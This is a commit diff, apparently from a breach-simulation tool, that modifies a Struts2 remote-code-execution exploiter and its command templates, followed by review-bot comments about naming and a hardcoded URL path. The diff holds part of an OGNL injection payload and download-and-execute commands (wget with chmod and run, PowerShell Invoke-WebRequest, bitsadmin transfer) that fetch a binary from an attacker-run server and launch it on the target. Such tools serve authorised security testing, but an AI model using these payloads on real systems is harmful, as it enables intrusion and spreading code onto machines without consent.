Fixed some bugs and added more notes
This commit is contained in:
parent
81712ddbf0
commit
671452243d
|
@ -12,7 +12,7 @@ import logging
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
from exploit.tools import get_target_monkey, get_monkey_depth
|
from exploit.tools import get_target_monkey, get_monkey_depth
|
||||||
from tools import build_monkey_commandline, HTTPTools
|
from tools import build_monkey_commandline, HTTPTools
|
||||||
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG
|
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
@ -20,9 +20,6 @@ LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300
|
DOWNLOAD_TIMEOUT = 300
|
||||||
|
|
||||||
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2Exploiter(HostExploiter):
|
class Struts2Exploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
|
@ -47,7 +44,8 @@ class Struts2Exploiter(HostExploiter):
|
||||||
if port[1]:
|
if port[1]:
|
||||||
current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
|
current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
|
||||||
else:
|
else:
|
||||||
current_host = "http://%s:%s" % (self.host.ip_addr, port[0])
|
# TODO remove struts
|
||||||
|
current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])
|
||||||
# Get full URL
|
# Get full URL
|
||||||
url = self.get_redirected(current_host)
|
url = self.get_redirected(current_host)
|
||||||
LOG.info("Trying to exploit with struts2")
|
LOG.info("Trying to exploit with struts2")
|
||||||
|
@ -87,7 +85,7 @@ class Struts2Exploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Started http server on %s", http_path)
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)
|
||||||
|
|
||||||
command = WGET_HTTP % {'monkey_path': dropper_path,
|
command = WGET_HTTP % {'monkey_path': dropper_path,
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
@ -135,12 +133,13 @@ class Struts2Exploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Started http server on %s", http_path)
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
# We need to double escape backslashes. Once for payload, twice for command
|
||||||
|
cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path))
|
||||||
|
|
||||||
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
|
||||||
backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
@ -196,8 +195,6 @@ class Struts2Exploiter(HostExploiter):
|
||||||
:param cmd: Code to try and execute on host
|
:param cmd: Code to try and execute on host
|
||||||
:return: response
|
:return: response
|
||||||
"""
|
"""
|
||||||
page = ""
|
|
||||||
|
|
||||||
payload = "%%{(#_='multipart/form-data')." \
|
payload = "%%{(#_='multipart/form-data')." \
|
||||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||||
"(#_memberAccess?" \
|
"(#_memberAccess?" \
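Review bot: The new http branch, `current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])`, hard-codes a `/struts` path that the https branch a few lines above does not get, so the exploiter now probes a different URL depending on the scheme, and the `# TODO remove struts` comment marks it as a leftover from a local test target. If the path is needed for a test deployment, make it a module-level constant (e.g. `_APP_PATH = ''`) appended in both branches before `self.get_redirected(current_host)`; otherwise drop it before merging so `current_host` is built from scheme, host and port alone as before. The enclosing method starts and ends outside the hunk.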
|
||||||
|
|
|
@ -19,8 +19,11 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
||||||
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
||||||
|
RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
|
||||||
|
|
||||||
# Commands used to check for architecture and if machine is exploitable
|
# Commands used to check for architecture and if machine is exploitable
|
||||||
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
||||||
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
||||||
|
|
||||||
# Commands used to check if monkeys already exists
|
# Commands used to check if monkeys already exists
|
||||||
EXISTS = "ls %s"
|
EXISTS = "ls %s"
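Review bot: The added `RDP_CMDLINE_HTTP_BITS_DROPPER` carries an `RDP_` prefix although nothing in it is RDP-specific — it is a generic bitsadmin-over-HTTP download that this commit uses as the Struts2 exploiter's Windows fallback — so the name is likely to mislead the next reader; `BITSADMIN_HTTP_DROPPER` (keeping the old name as an alias if another exploiter references it, which I cannot see from here) would be clearer. The constant also has no note on escaping: the struts2 caller substitutes an already backslash-doubled `monkey_path` and `parameters` into it, exactly as for `POWERSHELL_HTTP`, so a one-line comment such as `# Windows fallback download via BITS; callers must escape backslashes in monkey_path/parameters as for POWERSHELL_HTTP` would prevent an unescaped use elsewhere. Since bitsadmin is deprecated by Microsoft in favour of the BITS PowerShell cmdlets, it is also worth stating in that comment that this command is only the fallback when PowerShell is unavailable.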
|